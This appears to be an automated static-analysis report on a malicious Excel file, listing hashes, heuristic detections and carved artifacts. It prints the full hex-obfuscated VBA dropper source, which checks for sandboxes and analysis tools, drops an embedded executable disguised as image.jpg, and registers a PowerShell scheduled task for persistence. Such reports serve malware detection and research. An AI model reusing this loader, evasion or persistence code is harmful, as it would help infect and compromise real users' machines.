Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 cdf33bdc06da43c6…

MALICIOUS

Office (OOXML) / .XLSX

428.3 KB Created: 2026-01-09 02:09:33 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-19
MD5: 103060d9df236f80f851d4d47a627805 SHA-1: 8dfccbb32b4ce94dee2ee95b4db2ebd3aa796084 SHA-256: cdf33bdc06da43c6fb4c9fabbf515d42af8a4990c5549f29ef7aad93acc1a9bd
318 Risk Score

Heuristics 11

  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    ret = tltoiypblwfmg.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -File """ & tempPsFile & """", rktgglfckhihll, True)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set wmi = GetObject(fjcqijtguecrunm("77696e") & fjcqijtguecrunm("6d676d74733a5c5c2e5c726f6f745c63696d7632"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject(fjcqijtguecrunm("5368656c6c2e4170706c6963617469") & fjcqijtguecrunm("6f6e")) _
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set wmi = GetObject(fjcqijtguecrunm("77696e") & fjcqijtguecrunm("6d676d74733a5c5c2e5c726f6f745c63696d7632"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    eeaqtcpxkzogqtzdwo = Environ("TEMP") & "\update.log"
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 18025 bytes
SHA-256: 7df27ea9e2ef762732567ba34caec15ab91882bdd08a65cc1be6e744d055dbee
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Const uzcbzqxqhhmumu = 2
Const fcneuescivdpylq = 1
Const rktgglfckhihll = 0
Sub Auto_Open()
Dim eeaqtcpxkzogqtzdwo As String
eeaqtcpxkzogqtzdwo = Environ("TEMP") & "\update.log"
If Len(Dir(eeaqtcpxkzogqtzdwo)) > 0 Then
Call fxwlgevalafcsugxa
Exit Sub
End If
If prybyabgzifwq() Then
Call fxwlgevalafcsugxa
Else
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f74") & fjcqijtguecrunm("206265206f70656e65642e"), vbCritical
Exit Sub
End If
End Sub
Function prybyabgzifwq() As Boolean
Dim wmi As Object
Dim oymvnnmuce As Integer
Dim availableMemory As Double
Dim totalDiskSpace As Double
Dim systemDrive As String
Dim mwbjfhpamwtf As Object
Dim qzjyuryxjjmaw As Variant
qzjyuryxjjmaw = Array(fjcqijtguecrunm("6369732e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("636d6476697274682e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("616c697665") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("66696c6577617463686572") & fjcqijtguecrunm("736572766963652e657865"), fjcqijtguecrunm("6e67") & fjcqijtguecrunm("766d7376632e657865"), fjcqijtguecrunm("73616e") & fjcqijtguecrunm("64626f78696572706373732e657865"), _
fjcqijtguecrunm("616e") & fjcqijtguecrunm("616c797a65722e657865"), fjcqijtguecrunm("666f7274") & fjcqijtguecrunm("697472616365722e657865"), fjcqijtguecrunm("6e73766572") & fjcqijtguecrunm("63746c2e657865"), fjcqijtguecrunm("736269656374") & fjcqijtguecrunm("726c2e657865"), fjcqijtguecrunm("616e") & fjcqijtguecrunm("676172322e657865"), fjcqijtguecrunm("676f617463") & fjcqijtguecrunm("61737065722e657865"), _
fjcqijtguecrunm("6f6c6c796462672e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("736269657376632e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("6170696d6f6e6974") & fjcqijtguecrunm("6f722e657865"), fjcqijtguecrunm("476f6174436c69656e74417070") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("706569642e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("7363616e686f73742e65") & fjcqijtguecrunm("7865"), _
fjcqijtguecrunm("6170697370") & fjcqijtguecrunm("792e657865"), fjcqijtguecrunm("686965") & fjcqijtguecrunm("7733322e657865"), fjcqijtguecrunm("7065") & fjcqijtguecrunm("726c2e657865"), fjcqijtguecrunm("73636b746f6f6c") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("61706973707933322e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("686f6f") & fjcqijtguecrunm("6b616e616170702e657865"), fjcqijtguecrunm("7065746f") & fjcqijtguecrunm("6f6c732e657865"), _
fjcqijtguecrunm("7364") & fjcqijtguecrunm("636c742e657865"), fjcqijtguecrunm("6173") & fjcqijtguecrunm("7572612e657865"), fjcqijtguecrunm("686f6f6b657870") & fjcqijtguecrunm("6c6f7265722e657865"), fjcqijtguecrunm("706578706c6f7265") & fjcqijtguecrunm("722e657865"), fjcqijtguecrunm("7366746463") & fjcqijtguecrunm("632e657865"), fjcqijtguecrunm("617574") & fjcqijtguecrunm("6f7265706775692e657865"), fjcqijtguecrunm("687474706c6f67") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("70696e67") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("73687574646f") & fjcqijtguecrunm("776e6d6f6e2e657865"), fjcqijtguecrunm("6175") & fjcqijtguecrunm("746f72756e732e657865"), fjcqijtguecrunm("6963") & fjcqijtguecrunm("6573776f72642e657865"), fjcqijtguecrunm("707230633378702e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("736e6966666869") & fjcqijtguecrunm("742e657865"), _
fjcqijtguecrunm("6175746f72756e7363") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("69636c69636b65722d72656c") & fjcqijtguecrunm("656173652e657865"), fjcqijtguecrunm("7072696e63") & fjcqijtguecrunm("652e657865"), fjcqijtguecrunm("736e6f6f702e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("6175746f73637265656e73") & fjcqijtguecrunm("686f747465722e657865"), fjcqijtguecrunm("696461") & fjcqijtguecrunm("672e657865"), _
fjcqijtguecrunm("7072") & fjcqijtguecrunm("6f63616e616c797a65722e657865"), fjcqijtguecrunm("73706b") & fjcqijtguecrunm("726d6f6e2e657865"), fjcqijtguecrunm("6176637465737473756974652e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("696461") & fjcqijtguecrunm("6736342e657865"), fjcqijtguecrunm("70726f636573736861636b") & fjcqijtguecrunm("65722e657865"), fjcqijtguecrunm("737973616e616c797a") & fjcqijtguecrunm("65722e657865"), _
fjcqijtguecrunm("61767a2e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("6964") & fjcqijtguecrunm("61712e657865"), fjcqijtguecrunm("70726f") & fjcqijtguecrunm("636573736d656d64756d702e657865"), fjcqijtguecrunm("7379736572") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("626568") & fjcqijtguecrunm("6176696f7264756d7065722e657865"), fjcqijtguecrunm("696d") & fjcqijtguecrunm("6d756e69747964656275676765722e657865"), _
fjcqijtguecrunm("70726f63") & fjcqijtguecrunm("6578702e657865"), fjcqijtguecrunm("737973") & fjcqijtguecrunm("74656d6578706c6f7265722e657865"), fjcqijtguecrunm("62696e6469") & fjcqijtguecrunm("66662e657865"), fjcqijtguecrunm("696d706f7274") & fjcqijtguecrunm("7265632e657865"), fjcqijtguecrunm("70726f6365787036342e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("73797374656d6578706c") & fjcqijtguecrunm("6f726572736572766963652e657865"), _
fjcqijtguecrunm("425450") & fjcqijtguecrunm("5472617949636f6e2e657865"), fjcqijtguecrunm("696d") & fjcqijtguecrunm("756c2e657865"), fjcqijtguecrunm("70726f636d") & fjcqijtguecrunm("6f6e2e657865"), fjcqijtguecrunm("7379") & fjcqijtguecrunm("74686f6e2e657865"), fjcqijtguecrunm("63617074757265") & fjcqijtguecrunm("6261742e657865"), fjcqijtguecrunm("496e666f63") & fjcqijtguecrunm("6c69656e742e657865"), fjcqijtguecrunm("70726f636d6f6e3634") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("7461736b6d") & fjcqijtguecrunm("67722e657865"), fjcqijtguecrunm("636462") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("696e7374616c6c72697465") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("7079") & fjcqijtguecrunm("74686f6e2e657865"), fjcqijtguecrunm("7461736c6f67696e2e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("6366") & fjcqijtguecrunm("666578706c6f7265722e657865"), fjcqijtguecrunm("697066") & fjcqijtguecrunm("732e657865"), _
fjcqijtguecrunm("70797468") & fjcqijtguecrunm("6f6e772e657865"), fjcqijtguecrunm("74637064756d70") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("636c69636b73686172656c61756e63") & fjcqijtguecrunm("6865722e657865"), fjcqijtguecrunm("6970726f7365746d6f6e69746f722e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("7171") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("74637076696577") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("636c") & fjcqijtguecrunm("6f7365706f7075702e657865"), fjcqijtguecrunm("69726167656e74") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("717166666f2e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("717170726f74656374") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("746f74616c636d642e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("63706f727473") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("6a6f65626f78636f6e74726f") & fjcqijtguecrunm("6c2e657865"), _
fjcqijtguecrunm("717173") & fjcqijtguecrunm("672e657865"), fjcqijtguecrunm("7472") & fjcqijtguecrunm("6f6a6469652e6b767063726f7373666972652e657865"), fjcqijtguecrunm("6a6f65626f787365") & fjcqijtguecrunm("727665722e657865"), fjcqijtguecrunm("7261") & fjcqijtguecrunm("70746f72636c69656e742e657865"), fjcqijtguecrunm("7478706c617466") & fjcqijtguecrunm("6f726d2e657865"), fjcqijtguecrunm("646e662e") & fjcqijtguecrunm("657865"), _
fjcqijtguecrunm("6c616d65722e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("7265676d6f") & fjcqijtguecrunm("6e2e657865"), fjcqijtguecrunm("76697275732e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("64736e6966") & fjcqijtguecrunm("662e657865"), fjcqijtguecrunm("4c6f674854") & fjcqijtguecrunm("54502e657865"), fjcqijtguecrunm("72656773686f742e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("76782e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("64756d706361702e65") & fjcqijtguecrunm("7865"), _
fjcqijtguecrunm("6c6f72647065") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("5265704d677236342e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("7769") & fjcqijtguecrunm("6e616c797369732e657865"), fjcqijtguecrunm("656d756c") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("6d616c6d") & fjcqijtguecrunm("6f6e2e657865"), fjcqijtguecrunm("5265705574696c7333322e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("77696e6170696f766572") & fjcqijtguecrunm("7269646533322e657865"), _
fjcqijtguecrunm("657468") & fjcqijtguecrunm("657265616c2e657865"), fjcqijtguecrunm("6d626172") & fjcqijtguecrunm("756e2e657865"), fjcqijtguecrunm("5265") & fjcqijtguecrunm("7055782e657865"), fjcqijtguecrunm("7769") & fjcqijtguecrunm("6e6462672e657865"), fjcqijtguecrunm("657474657263") & fjcqijtguecrunm("61702e657865"), fjcqijtguecrunm("6d64706d6f6e") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("72756e73616d706c65") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("77696e") & fjcqijtguecrunm("64756d702e657865"), fjcqijtguecrunm("66616b656874747073") & fjcqijtguecrunm("65727665722e657865"), fjcqijtguecrunm("6d6d722e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("7361") & fjcqijtguecrunm("6d7031652e657865"), fjcqijtguecrunm("77696e7370792e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("6661") & fjcqijtguecrunm("6b657365727665722e657865"), fjcqijtguecrunm("73616d706c652e") & fjcqijtguecrunm("657865"), _
fjcqijtguecrunm("77697265736861") & fjcqijtguecrunm("726b2e657865"), fjcqijtguecrunm("6c67") & fjcqijtguecrunm("6875625f6167656e742e657865"), fjcqijtguecrunm("44656c6c4f7074696d697a65") & fjcqijtguecrunm("722e657865"), fjcqijtguecrunm("46696464") & fjcqijtguecrunm("6c65722e657865"), fjcqijtguecrunm("6d756c746970") & fjcqijtguecrunm("6f742e657865"), fjcqijtguecrunm("73616e64626f78696563") & fjcqijtguecrunm("727970746f2e657865"), fjcqijtguecrunm("5858582e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("66696c656d") & fjcqijtguecrunm("6f6e2e657865"), fjcqijtguecrunm("6e6574736e696666") & fjcqijtguecrunm("65722e657865"), _
fjcqijtguecrunm("73616e64626f78") & fjcqijtguecrunm("696564636f6d6c61756e63682e657865"))
On Error Resume Next
Set wmi = GetObject(fjcqijtguecrunm("77696e") & fjcqijtguecrunm("6d676d74733a5c5c2e5c726f6f745c63696d7632"))
systemDrive = wmi.ExecQuery(fjcqijtguecrunm("53656c6563742053797374656d44726976652066726f6d2057696e33325f4f7065726174696e") & fjcqijtguecrunm("6753797374656d")).ItemIndex(0).systemDrive
systemDrive = Left(systemDrive, uzcbzqxqhhmumu)
oymvnnmuce = wmi.ExecQuery(fjcqijtguecrunm("53656c656374204e756d6265724f664c6f676963616c50726f636573736f72732066726f6d") & fjcqijtguecrunm("2057696e33325f436f6d707574657253797374656d")).ItemIndex(0).NumberOfLogicalProcessors
If oymvnnmuce < 2 Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420") & fjcqijtguecrunm("6265206f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
totalMemory = wmi.ExecQuery(fjcqijtguecrunm("53656c65637420546f74616c506879736963616c4d656d6f72792066726f6d2057696e") & fjcqijtguecrunm("33325f436f6d707574657253797374656d")).ItemIndex(0).TotalPhysicalMemory / (1024 ^ 2)
If totalMemory < 2048 Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420626520") & fjcqijtguecrunm("6f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
Set mwbjfhpamwtf = wmi.ExecQuery(fjcqijtguecrunm("53656c6563742053697a652066726f6d205769") & fjcqijtguecrunm("6e33325f4c6f676963616c4469736b2077686572652044657669636549443d27") & systemDrive & fjcqijtguecrunm("27")).ItemIndex(0)
totalDiskSpace = mwbjfhpamwtf.Size / (1024 ^ 3)
If totalDiskSpace < 40 Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f742062") & fjcqijtguecrunm("65206f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
Dim iqtqwkwi, pf, hasPagefile
hasPagefile = False
Set iqtqwkwi = wmi.ExecQuery(fjcqijtguecrunm("53656c656374202a206672") & fjcqijtguecrunm("6f6d2057696e33325f5061676546696c655573616765"))
For Each pf In iqtqwkwi
If pf.AllocatedBaseSize > 0 Then
hasPagefile = True
Exit For
End If
Next
If Not hasPagefile Then
Set iqtqwkwi = wmi.ExecQuery(fjcqijtguecrunm("53656c656374202a2066726f6d2057696e33325f5061676546696c65536574") & fjcqijtguecrunm("74696e67"))
For Each pf In iqtqwkwi
If pf.InitialSize > 0 Or pf.MaximumSize > 0 Then
hasPagefile = True
Exit For
End If
Next
End If
If Not hasPagefile Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f74206265206f70656e65") & fjcqijtguecrunm("642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
If erwujsbpnjxxngev(qzjyuryxjjmaw) Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420") & fjcqijtguecrunm("6265206f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
prybyabgzifwq = True
End Function
Function erwujsbpnjxxngev(qzjyuryxjjmaw As Variant) As Boolean
Dim wmi As Object
Dim nputyvsxsfm As Object
Dim uhkggqremlmhrxfao As Object
Dim nhhfuxec As Integer
On Error Resume Next
Set wmi = GetObject(fjcqijtguecrunm("77696e6d676d74733a5c5c2e5c72") & fjcqijtguecrunm("6f6f745c63696d7632"))
Set nputyvsxsfm = wmi.ExecQuery(fjcqijtguecrunm("53656c656374202a2066726f6d2057696e33325f50726f") & fjcqijtguecrunm("63657373"))
For Each uhkggqremlmhrxfao In nputyvsxsfm
For nhhfuxec = LBound(qzjyuryxjjmaw) To UBound(qzjyuryxjjmaw)
If LCase(uhkggqremlmhrxfao.Name) = LCase(qzjyuryxjjmaw(nhhfuxec)) Then
erwujsbpnjxxngev = True
Exit Function
End If
Next nhhfuxec
Next uhkggqremlmhrxfao
erwujsbpnjxxngev = False
End Function
Sub fxwlgevalafcsugxa()
Dim nhrxmkdgxwoeqmqqnc As String
Dim pjmhbxidgkmaxgt As String
Dim ugabspcm As Object
Dim qtmcgbayej As String
Dim edobzwkbnyoi As String
Dim obgbnfap As String
Dim aeqwnanbmwej As String
Dim tpltnqekmtcxyqe As String
ActiveSheet.OLEObjects(fjcqijtguecrunm("4f626a") & fjcqijtguecrunm("6563742031")).Copy
CreateObject(fjcqijtguecrunm("5368656c6c2e4170706c6963617469") & fjcqijtguecrunm("6f6e")) _
.Namespace(ActiveWorkbook.Path) _
.Self.InvokeVerb fjcqijtguecrunm("506173") & fjcqijtguecrunm("7465")
filePath = ActiveWorkbook.Path & fjcqijtguecrunm("5c696d6167") & fjcqijtguecrunm("652e6a7067")
appDataPath = CreateObject(fjcqijtguecrunm("575363726970742e53") & fjcqijtguecrunm("68656c6c")).SpecialFolders(fjcqijtguecrunm("417070") & fjcqijtguecrunm("44617461"))
tpltnqekmtcxyqe = appDataPath & fjcqijtguecrunm("5c4d534f66") & fjcqijtguecrunm("666963655c")
If Dir(tpltnqekmtcxyqe, vbDirectory) = "" Then
MkDir tpltnqekmtcxyqe
Else
Kill filePath
Exit Sub
End If
obgbnfap = tpltnqekmtcxyqe & fjcqijtguecrunm("6d737375") & fjcqijtguecrunm("73622e657865") '
FileCopy filePath, obgbnfap
Set ugabspcm = CreateObject(fjcqijtguecrunm("5753") & fjcqijtguecrunm("63726970742e5368656c6c"))
nhrxmkdgxwoeqmqqnc = fjcqijtguecrunm("557064617465546173") & fjcqijtguecrunm("6b4d616368696e65")
aeqwnanbmwej = fjcqijtguecrunm("7374") & fjcqijtguecrunm("617274")
tempPsFile = Environ("TEMP") & "\CreateTask_" & Format(Now, "yyyymmdd_hhnnss") & "_" & Int((10000) * Rnd) & ".ps1"
psCommand = fjcqijtguecrunm("696620282d4e6f7420284765742d5363686564756c65645461736b202d5461736b4e") & fjcqijtguecrunm("616d652027") & nhrxmkdgxwoeqmqqnc & fjcqijtguecrunm("27202d4572726f72416374696f6e2053696c656e746c79436f") & fjcqijtguecrunm("6e74696e75652929207b") & vbCrLf & _
fjcqijtguecrunm("2020202024737461727454696d65203d20284765742d44") & fjcqijtguecrunm("617465292e4164644d696e75746573283239292e546f537472696e67282748483a6d6d2729") & vbCrLf & _
fjcqijtguecrunm("2020202024616374696f6e203d204e65772d5363686564756c65645461736b416374696f6e202d45786563757465") & fjcqijtguecrunm("2027") & obgbnfap & fjcqijtguecrunm("27202d417267756d656e74") & fjcqijtguecrunm("2027") & aeqwnanbmwej & fjcqijtguecrunm("27202d576f726b696e67") & fjcqijtguecrunm("4469726563746f72792027") & tpltnqekmtcxyqe & fjcqijtguecrunm("27") & vbCrLf & _
fjcqijtguecrunm("202020202474726967676572203d204e65772d5363686564756c65645461736b54726967676572202d4461696c") & fjcqijtguecrunm("79202d41742024737461727454696d65") & vbCrLf & _
fjcqijtguecrunm("2020202052656769737465722d5363686564") & fjcqijtguecrunm("756c65645461736b202d5461736b4e616d652027") & nhrxmkdgxwoeqmqqnc & fjcqijtguecrunm("27202d416374696f6e2024616374696f6e") & fjcqijtguecrunm("202d54726967676572202474726967676572202d466f726365") & vbCrLf & _
fjcqijtguecrunm("7d")
Dim irunxnvgqdvx As Object, rowahtvsmgbfkhe As Object
Set irunxnvgqdvx = CreateObject(fjcqijtguecrunm("536372697074696e672e") & fjcqijtguecrunm("46696c6553797374656d4f626a656374"))
Set rowahtvsmgbfkhe = irunxnvgqdvx.CreateTextFile(tempPsFile, True, True)
rowahtvsmgbfkhe.Write psCommand
rowahtvsmgbfkhe.Close
Set tltoiypblwfmg = CreateObject(fjcqijtguecrunm("575363726970742e5368") & fjcqijtguecrunm("656c6c"))
ret = tltoiypblwfmg.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -File """ & tempPsFile & """", rktgglfckhihll, True)
On Error Resume Next
irunxnvgqdvx.DeleteFile tempPsFile, True
On Error GoTo 0
Kill filePath
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e") & fjcqijtguecrunm("6e6f74206265206f70656e65642e2e2e"), vbCritical
End Sub

Attribute VB_Name = "Module2"
Function fjcqijtguecrunm(ByVal rtkhffdrz As String) As String
Dim hdwzvgtoxf As Long
For hdwzvgtoxf = 1 To Len(rtkhffdrz) Step 2
fjcqijtguecrunm = fjcqijtguecrunm & Chr$(Val("&H" & Mid$(rtkhffdrz, hdwzvgtoxf, 2)))
Next hdwzvgtoxf
End Function
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject1.bin 712192 bytes
SHA-256: 70157f517e8e7622f49eb112d8d4a10f08dac3a15857c3d92ac07a49bf869d89
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.52, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 705064 bytes
SHA-256: c4b54097f7a1ccb0a4e4a10497431b8d938a7ac0e030b18cf258cb2eb3c8adb6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00_image.jpg ole-package-payload OOXML xl/embeddings/oleObject1.bin Ole10Native payload: display_name=image.jpg; full_path=C:\Users\Admin\AppData\Local\Temp\{E4D8AFD4-B54C-448A-88EA-2CF8749DA8C9}\image.jpg; temp_path=; def_file= 704512 bytes
SHA-256: f2977b1f3f05c3e38d301232dccf059ba3bb6b126d1f892d7a338c3f9fcaa49e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 38400 bytes
SHA-256: 67063b951eca0481a6118f835ed6189b6d2062d46dcdae8cf0c6fe41703e7ef4
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 4988 bytes
SHA-256: 47b36d4917a574120d2728674abc24e9796871c1fc19eca067ce81eca3058888

Open this report in the interactive analyzer, or submit your own file for analysis.